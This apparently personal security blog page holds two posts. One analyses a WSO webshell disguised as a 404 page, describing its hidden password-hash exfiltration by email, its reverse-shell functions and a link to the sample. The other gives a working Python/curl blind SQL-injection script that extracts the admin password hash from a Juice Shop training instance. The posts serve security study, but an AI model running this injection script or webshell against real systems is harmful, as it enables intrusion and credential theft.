Monday, February 19, 2018

Reversing a Webshell - WSO 2.7

Recently, I stumbled across a webshell that was impersonating a 404 page not found error.  The original filename was "404.php.gif".  I did notify the owner of the site.  After acquiring the webshell and then placing it in a VM, you quickly see the 404 message.

Then viewing the source of the page we notice some code that is not showing that is requesting a password.


The source code is base64_encoded and gzipped.  After extracting the original code you see the following heading.


Quickly you find a password in the form of an MD5 hash.  Instead of breaking the hash, I find the section in the code and comment it out so I can get past it.  Then the main interface of the webshell loads.


Looking through the code you find a base64 encoded section that sends an email to a gmail account.


The email contains the host of the webshell and the MD5 of the password that is used to access the site.  This code is executed when someone accesses the webshell.

This webshell has full access to the files on the site.  This would allow the shell operator to find the config.inc.php file containing database credentials.  Then the credentials could be placed into the "Sql" section of the webshell to provide full access to the database.

In addition to the above mentioned functions the webshell has built-in functions to open up a shell using perl, a reverse shell using perl, running system commands through php, searching for local-file inclusion vulnerabilities, port scanning the local host, port scanning other hosts on the network or other networks, and other functions.

Update your sites and verify your code has not changed.  Here is a copy of the webshell if you would like to explore it.  Password is "malware".


















at No comments:

Tuesday, February 13, 2018

Juice-shop Challenge with SQL Injection

In a challenge to create an automated way to extract the password hash from Juice-Shop at the login prompt through sql injection, I created the following script. 



#!/usr/bin/python2

import os
import subprocess

currentHash = ""
stringList = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f"]
for sizeHash in range(1,33):
    for hashString in stringList:
        command = "curl -H 'Content-Type: application/json' -d \"{\\\"email\\\":\\\"admin@juice-sh.op' AND '" 
        command += str(currentHash) + str(hashString) 
        command += "'=substr(password,1,"
        command += str(sizeHash)
        command += ")--;\\\",\\\"password\\\":\\\"test\\\"}\" http://172.17.0.2:3000/rest/user/login"
        output = subprocess.check_output([command], shell=True, stderr=subprocess.STDOUT)
        if "admin@juice-sh.op" in output:
            print "Hash: " + str(currentHash) + str(hashString)
            currentHash = str(currentHash) + str(hashString)
            break
print "MD5 hash of admin@juice-sh.op: " + currentHash
# Validate hash with the following command: echo -n "admin123" | md5sum
at No comments:
Subscribe to: Posts (Atom)

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...